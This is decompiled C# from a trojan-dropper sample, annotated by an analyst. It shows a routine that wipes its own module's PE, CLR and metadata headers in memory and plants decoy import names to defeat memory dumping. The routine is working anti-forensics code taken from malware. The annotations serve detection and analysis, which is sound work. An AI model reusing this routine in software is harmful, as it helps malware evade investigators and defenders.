// Decompiled with JetBrains decompiler
// Type: �鞇ᛰ퓹鈠
// Assembly: Inclorofom, Version=1.1.5.6, Culture=neutral, PublicKeyToken=null
// MVID: A522D052-C5DC-490C-B0ED-0BBC19A34C0E
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Dapato.awqq-edab95afd20436274ac39e7bbd9b33db4903ad56017b194e3d2cdd8b211b0f3e.exe

using System;
using System.Runtime.InteropServices;

// Analyst summary (added during review; the code below is unchanged decompiler output).
//
// This static class holds a single anti-dump / anti-memory-forensics routine. It takes
// the load address of its own module and overwrites, in place, the in-memory structures
// that tools use to locate .NET metadata in a loaded image:
//   * the data-directory slot at (end of optional header - 16) and the 72-byte
//     structure it points to (CLR header, per the PE/COFF layout),
//   * the 4-byte signature and every stream header of the metadata root,
//   * the 8-byte name field of every section header,
//   * the first import descriptor's DLL name and first imported function name, which
//     are replaced with the decoy strings "ntdll.dll" / "NtContinue".
//
// Defender notes:
//   * Only the mapped copy is modified; nothing here writes to the file on disk, so
//     comparing the on-disk PE headers with the in-memory image exposes the tampering.
//   * Every touched range is switched to protection 0x40 (PAGE_EXECUTE_READWRITE) and
//     never restored, leaving writable+executable header pages in a managed module.
//   * Static indicators visible in this listing: a P/Invoke to kernel32!VirtualProtect
//     from an obfuscated type, Marshal.GetHINSTANCE on the type's own module, and the
//     integer constants that spell the two decoy strings.
//   * NOTE(review): the structure resembles the anti-dump stubs emitted by off-the-shelf
//     .NET protectors; attribution is not established by this listing.
internal static class \uFFFD\uE0C1\uE4F6鞇ᛰ퓹\uF6E8鈠
{
  // P/Invoke binding for kernel32!VirtualProtect under an obfuscated name.
  // Every call site passes flNewProtect = 64U (0x40, PAGE_EXECUTE_READWRITE) and
  // ignores both the return value and the old protection written to lpflOldProtect.
  // NOTE(review): PreserveSig = false is unusual for a BOOL-returning Win32 API;
  // its runtime effect here is not determinable from the listing.
  [DllImport("kernel32.dll", EntryPoint = "VirtualProtect", PreserveSig = false)]
  private static extern unsafe bool ऄ㕎\uF623諜펤犬ⅈ᥆(
    byte* lpAddress,
    int dwSize,
    uint flNewProtect,
    out uint lpflOldProtect);

  // Anti-dump entry point: wipes PE/CLR header fields of the current module in memory.
  // Takes no arguments and returns nothing; all effects are raw memory writes relative
  // to the module base. No bounds or sanity checks are made on any value read from the
  // headers, so a malformed image would lead to out-of-range reads and writes.
  public static unsafe void ᕔ祩晾怏\uFFFD\uFFFD\uF888㩟()
  {
    // Base address of the module that contains this type.
    byte* hinstance = (byte*) (void*) Marshal.GetHINSTANCE(typeof (\uFFFD\uE0C1\uE4F6鞇ᛰ퓹\uF6E8鈠).Module);
    // Offset 60 (0x3C) of the DOS header holds e_lfanew, the offset of the PE header.
    byte* numPtr1 = hinstance + 60;
    // PE header + 6 = NumberOfSections (4-byte signature + 2-byte Machine).
    byte* numPtr2 = hinstance + (int) *(uint*) numPtr1 + 6;
    ushort length = *(ushort*) numPtr2;
    // PE header + 20 = SizeOfOptionalHeader.
    byte* numPtr3 = numPtr2 + 14;
    ushort num1 = *(ushort*) numPtr3;
    // PE header + 24 + SizeOfOptionalHeader = first section header.
    // Negative offsets from here index the data directories at the end of the
    // optional header: -16 is slot 14 (CLR header), -120 is slot 1 (import table).
    byte* numPtr4 = numPtr3 + 4 + (int) num1;
    // 11-byte stack buffer filled with little-endian constants that decode to the
    // ASCII string "ntdll.dll" followed by NUL padding.
    // ISSUE: untyped stack allocation
    byte* numPtr5 = (byte*) __untypedstackalloc(new IntPtr(11));
    *(int*) numPtr5 = 1818522734;
    *(int*) (numPtr5 + 4) = 1818504812;
    *(short*) (numPtr5 + 8) = (short) 108;
    numPtr5[10] = (byte) 0;
    // 11-byte stack buffer that decodes to "NtContinue" plus a terminating NUL.
    // ISSUE: untyped stack allocation
    byte* numPtr6 = (byte*) __untypedstackalloc(new IntPtr(11));
    *(int*) numPtr6 = 1866691662;
    *(int*) (numPtr6 + 4) = 1852404846;
    *(short*) (numPtr6 + 8) = (short) 25973;
    numPtr6[10] = (byte) 0;
    // Two layouts are handled. In this first branch every RVA is added straight to
    // the module base; in the else branch RVAs are first translated through the
    // section table.
    // NOTE(review): presumably this separates an image mapped by the loader from one
    // held in raw file layout; the exact meaning of the "" test should be confirmed.
    if (typeof (\uFFFD\uE0C1\uE4F6鞇ᛰ퓹\uF6E8鈠).Module.FullyQualifiedName != "")
    {
      uint lpflOldProtect;
      // Make the CLR data-directory slot (RVA + size, 8 bytes) writable.
      \uFFFD\uE0C1\uE4F6鞇ᛰ퓹\uF6E8鈠.ऄ㕎\uF623諜펤犬ⅈ᥆(numPtr4 - 16, 8, 64U, out lpflOldProtect);
      // Zero the size, remember where the RVA pointed, then zero the RVA as well.
      *(int*) (numPtr4 - 12) = 0;
      byte* lpAddress1 = hinstance + (int) *(uint*) (numPtr4 - 16);
      *(int*) (numPtr4 - 16) = 0;
      // A non-zero import-table RVA triggers the import-name rewrite first.
      if (*(uint*) (numPtr4 - 120) != 0U)
        goto label_41;
label_25:
      // Blank the 8-byte name of every section header (40-byte stride).
      for (int index = 0; index < (int) length; index++)
      {
        \uFFFD\uE0C1\uE4F6鞇ᛰ퓹\uF6E8鈠.ऄ㕎\uF623諜펤犬ⅈ᥆(numPtr4, 8, 64U, out lpflOldProtect);
        Marshal.Copy(new byte[8], 0, (IntPtr) (void*) numPtr4, 8);
        numPtr4 += 40;
      }
      // 72 bytes matches the size of the CLR header; offset 8 is the metadata RVA.
      \uFFFD\uE0C1\uE4F6鞇ᛰ퓹\uF6E8鈠.ऄ㕎\uF623諜펤犬ⅈ᥆(lpAddress1, 72, 64U, out lpflOldProtect);
      byte* lpAddress2 = hinstance + (int) *(uint*) (lpAddress1 + 8);
      // Zero the first 16 bytes of that header, including the metadata RVA and size.
      *(int*) lpAddress1 = 0;
      *(int*) (lpAddress1 + 4) = 0;
      *(int*) (lpAddress1 + 8) = 0;
      *(int*) (lpAddress1 + 12) = 0;
      // Zero the 4-byte signature at the start of the metadata root.
      \uFFFD\uE0C1\uE4F6鞇ᛰ퓹\uF6E8鈠.ऄ㕎\uF623諜펤犬ⅈ᥆(lpAddress2, 4, 64U, out lpflOldProtect);
      *(int*) lpAddress2 = 0;
      // Offset 12 holds the version-string length; skip the string, round up to a
      // 4-byte boundary, skip 2 more bytes, and land on the stream count.
      // NOTE(review): the (uint) cast truncates the pointer, so this expression only
      // makes sense in a 32-bit process - confirm against the sample's target.
      byte* numPtr7 = lpAddress2 + 12;
      byte* numPtr8 = (byte*) ((ulong) ((uint) (numPtr7 + (int) *(uint*) numPtr7) + 7U) & 18446744073709551612UL) + 2;
      // As decompiled, only one byte of the count is read (numPtr8 is a byte*).
      ushort num2 = (ushort) *numPtr8;
      byte* lpAddress3 = numPtr8 + 2;
      // For each stream header: zero the 8-byte offset/size pair, then its name.
      for (int index1 = 0; index1 < (int) num2; index1++)
      {
        \uFFFD\uE0C1\uE4F6鞇ᛰ퓹\uF6E8鈠.ऄ㕎\uF623諜펤犬ⅈ᥆(lpAddress3, 8, 64U, out lpflOldProtect);
        *(int*) lpAddress3 = 0;
        byte* numPtr9 = lpAddress3 + 4;
        *(int*) numPtr9 = 0;
        lpAddress3 = numPtr9 + 4;
        // The name is cleared in 4-byte groups (at most 8 groups). Hitting a zero
        // byte ends the name; the pointer is then advanced to the end of the current
        // 4-byte group so it sits on the next stream header.
        for (int index2 = 0; index2 < 8; index2++)
        {
          \uFFFD\uE0C1\uE4F6鞇ᛰ퓹\uF6E8鈠.ऄ㕎\uF623諜펤犬ⅈ᥆(lpAddress3, 4, 64U, out lpflOldProtect);
          *lpAddress3 = (byte) 0;
          byte* numPtr10 = lpAddress3 + 1;
          if (*numPtr10 == (byte) 0)
          {
            lpAddress3 = numPtr10 + 3;
            break;
          }
          *numPtr10 = (byte) 0;
          byte* numPtr11 = numPtr10 + 1;
          if (*numPtr11 == (byte) 0)
          {
            lpAddress3 = numPtr11 + 2;
            break;
          }
          *numPtr11 = (byte) 0;
          byte* numPtr12 = numPtr11 + 1;
          if (*numPtr12 == (byte) 0)
          {
            lpAddress3 = numPtr12 + 1;
            break;
          }
          *numPtr12 = (byte) 0;
          lpAddress3 = numPtr12 + 1;
        }
      }
      return;
label_41:
      // Import rewrite: numPtr13 is the first import descriptor. Its first dword
      // leads to the lookup table, and offset 12 is the RVA of the DLL name.
      byte* numPtr13 = hinstance + (int) *(uint*) (numPtr4 - 120);
      byte* numPtr14 = hinstance + (int) *(uint*) numPtr13;
      byte* lpAddress4 = hinstance + (int) *(uint*) (numPtr13 + 12);
      // First lookup entry -> hint/name record; +2 skips the 2-byte hint.
      byte* lpAddress5 = hinstance + (int) *(uint*) numPtr14 + 2;
      // Overwrite the DLL name (11 bytes) with the "ntdll.dll" buffer.
      // NOTE(review): for a managed executable these two strings are presumably
      // "mscoree.dll" and "_CorExeMain" (11 characters each); the listing does not
      // show the original values.
      \uFFFD\uE0C1\uE4F6鞇ᛰ퓹\uF6E8鈠.ऄ㕎\uF623諜펤犬ⅈ᥆(lpAddress4, 11, 64U, out lpflOldProtect);
      for (int index = 0; index < 11; ++index)
        lpAddress4[index] = numPtr5[index];
      // Overwrite the imported function name (11 bytes) with "NtContinue".
      \uFFFD\uE0C1\uE4F6鞇ᛰ퓹\uF6E8鈠.ऄ㕎\uF623諜펤犬ⅈ᥆(lpAddress5, 11, 64U, out lpflOldProtect);
      for (int index = 0; index < 11; index++)
        lpAddress5[index] = numPtr6[index];
      goto label_25;
    }
    else
    {
      // Same wipe as above, but each RVA is first converted to an offset from the
      // module base by looking it up in the section table.
      uint lpflOldProtect;
      \uFFFD\uE0C1\uE4F6鞇ᛰ퓹\uF6E8鈠.ऄ㕎\uF623諜펤犬ⅈ᥆(numPtr4 - 16, 8, 64U, out lpflOldProtect);
      *(int*) (numPtr4 - 12) = 0;
      // num3 = CLR header RVA (read before the slot is zeroed).
      uint num3 = *(uint*) (numPtr4 - 16);
      *(int*) (numPtr4 - 16) = 0;
      // num4 = import table RVA.
      uint num4 = *(uint*) (numPtr4 - 120);
      // Per-section copies of header fields at offsets 12, 8 and 20, which the
      // PE/COFF layout defines as VirtualAddress, VirtualSize and PointerToRawData.
      uint[] numArray1 = new uint[(int) length];
      uint[] numArray2 = new uint[(int) length];
      uint[] numArray3 = new uint[(int) length];
      for (int index = 0; index < (int) length; ++index)
      {
        // Blank the section name; the fields read below lie beyond those 8 bytes.
        \uFFFD\uE0C1\uE4F6鞇ᛰ퓹\uF6E8鈠.ऄ㕎\uF623諜펤犬ⅈ᥆(numPtr4, 8, 64U, out lpflOldProtect);
        Marshal.Copy(new byte[8], 0, (IntPtr) (void*) numPtr4, 8);
        numArray1[index] = *(uint*) (numPtr4 + 12);
        numArray2[index] = *(uint*) (numPtr4 + 8);
        numArray3[index] = *(uint*) (numPtr4 + 20);
        numPtr4 += 40;
      }
      if (num4 != 0U)
        goto label_4;
label_2:
      // RVA translation, repeated inline for every RVA below: find the section whose
      // range contains the value and rebase it onto that section's raw-data pointer.
      // Both comparisons are strict, so a value exactly equal to a section's start
      // address is left untranslated.
      for (int index = 0; index < (int) length; index++)
      {
        if (numArray1[index] < num3 && num3 < numArray1[index] + numArray2[index])
        {
          num3 = num3 - numArray1[index] + numArray3[index];
          break;
        }
      }
      // CLR header (72 bytes); offset 8 is the metadata RVA, translated next.
      byte* lpAddress6 = hinstance + (int) num3;
      \uFFFD\uE0C1\uE4F6鞇ᛰ퓹\uF6E8鈠.ऄ㕎\uF623諜펤犬ⅈ᥆(lpAddress6, 72, 64U, out lpflOldProtect);
      uint num5 = *(uint*) (lpAddress6 + 8);
      for (int index = 0; index < (int) length; index++)
      {
        if (numArray1[index] < num5 && num5 < numArray1[index] + numArray2[index])
        {
          num5 = num5 - numArray1[index] + numArray3[index];
          break;
        }
      }
      // Zero the first 16 bytes of the CLR header.
      *(int*) lpAddress6 = 0;
      *(int*) (lpAddress6 + 4) = 0;
      *(int*) (lpAddress6 + 8) = 0;
      *(int*) (lpAddress6 + 12) = 0;
      // Zero the metadata root signature.
      byte* lpAddress7 = hinstance + (int) num5;
      \uFFFD\uE0C1\uE4F6鞇ᛰ퓹\uF6E8鈠.ऄ㕎\uF623諜펤犬ⅈ᥆(lpAddress7, 4, 64U, out lpflOldProtect);
      *(int*) lpAddress7 = 0;
      // Skip the version string (length at offset 12), align to 4, skip 2 bytes,
      // then read the stream count. Same pointer-truncation caveat as the first
      // branch (NOTE(review): 32-bit assumption, confirm).
      byte* numPtr15 = lpAddress7 + 12;
      byte* numPtr16 = (byte*) ((ulong) ((uint) (numPtr15 + (int) *(uint*) numPtr15) + 7U) & 18446744073709551612UL) + 2;
      ushort num6 = (ushort) *numPtr16;
      byte* lpAddress8 = numPtr16 + 2;
      // Wipe each stream header: offset/size pair, then the name in 4-byte groups.
      // The nested if/else form is the decompiler's rendering of the same
      // stop-at-first-zero-byte walk used in the first branch.
      for (int index3 = 0; index3 < (int) num6; ++index3)
      {
        \uFFFD\uE0C1\uE4F6鞇ᛰ퓹\uF6E8鈠.ऄ㕎\uF623諜펤犬ⅈ᥆(lpAddress8, 8, 64U, out lpflOldProtect);
        *(int*) lpAddress8 = 0;
        byte* numPtr17 = lpAddress8 + 4;
        *(int*) numPtr17 = 0;
        lpAddress8 = numPtr17 + 4;
        for (int index4 = 0; index4 < 8; ++index4)
        {
          \uFFFD\uE0C1\uE4F6鞇ᛰ퓹\uF6E8鈠.ऄ㕎\uF623諜펤犬ⅈ᥆(lpAddress8, 4, 64U, out lpflOldProtect);
          *lpAddress8 = (byte) 0;
          byte* numPtr18 = lpAddress8 + 1;
          if (*numPtr18 == (byte) 0)
          {
            lpAddress8 = numPtr18 + 3;
            break;
          }
          *numPtr18 = (byte) 0;
          byte* numPtr19 = numPtr18 + 1;
          if (*numPtr19 != (byte) 0)
          {
            *numPtr19 = (byte) 0;
            byte* numPtr20 = numPtr19 + 1;
            if (*numPtr20 != (byte) 0)
            {
              *numPtr20 = (byte) 0;
              lpAddress8 = numPtr20 + 1;
            }
            else
            {
              lpAddress8 = numPtr20 + 1;
              break;
            }
          }
          else
          {
            lpAddress8 = numPtr19 + 2;
            break;
          }
        }
      }
      return;
label_4:
      // Import rewrite for this layout. num4 = import table RVA -> first descriptor.
      for (int index = 0; index < (int) length; ++index)
      {
        if (numArray1[index] < num4 && num4 < numArray1[index] + numArray2[index])
        {
          num4 = num4 - numArray1[index] + numArray3[index];
          break;
        }
      }
      byte* numPtr21 = hinstance + (int) num4;
      // num7 = RVA in the descriptor's first dword (import lookup table).
      uint num7 = *(uint*) numPtr21;
      for (int index = 0; index < (int) length; index++)
      {
        if (numArray1[index] < num7 && num7 < numArray1[index] + numArray2[index])
        {
          num7 = num7 - numArray1[index] + numArray3[index];
          break;
        }
      }
      byte* numPtr22 = hinstance + (int) num7;
      // num8 = RVA of the DLL name (descriptor offset 12).
      uint num8 = *(uint*) (numPtr21 + 12);
      for (int index = 0; index < (int) length; ++index)
      {
        if (numArray1[index] < num8 && num8 < numArray1[index] + numArray2[index])
        {
          num8 = num8 - numArray1[index] + numArray3[index];
          break;
        }
      }
      // num9 = RVA of the first imported function's name (hint/name record + 2).
      uint num9 = *(uint*) numPtr22 + 2U;
      for (int index = 0; index < (int) length; index++)
      {
        if (numArray1[index] < num9 && num9 < numArray1[index] + numArray2[index])
        {
          num9 = num9 - numArray1[index] + numArray3[index];
          break;
        }
      }
      // Replace the DLL name with "ntdll.dll" and the function name with "NtContinue".
      \uFFFD\uE0C1\uE4F6鞇ᛰ퓹\uF6E8鈠.ऄ㕎\uF623諜펤犬ⅈ᥆(hinstance + (int) num8, 11, 64U, out lpflOldProtect);
      for (int index = 0; index < 11; ++index)
        (hinstance + (int) num8)[index] = numPtr5[index];
      \uFFFD\uE0C1\uE4F6鞇ᛰ퓹\uF6E8鈠.ऄ㕎\uF623諜펤犬ⅈ᥆(hinstance + (int) num9, 11, 64U, out lpflOldProtect);
      for (int index = 0; index < 11; index++)
        (hinstance + (int) num9)[index] = numPtr6[index];
      goto label_2;
    }
  }
}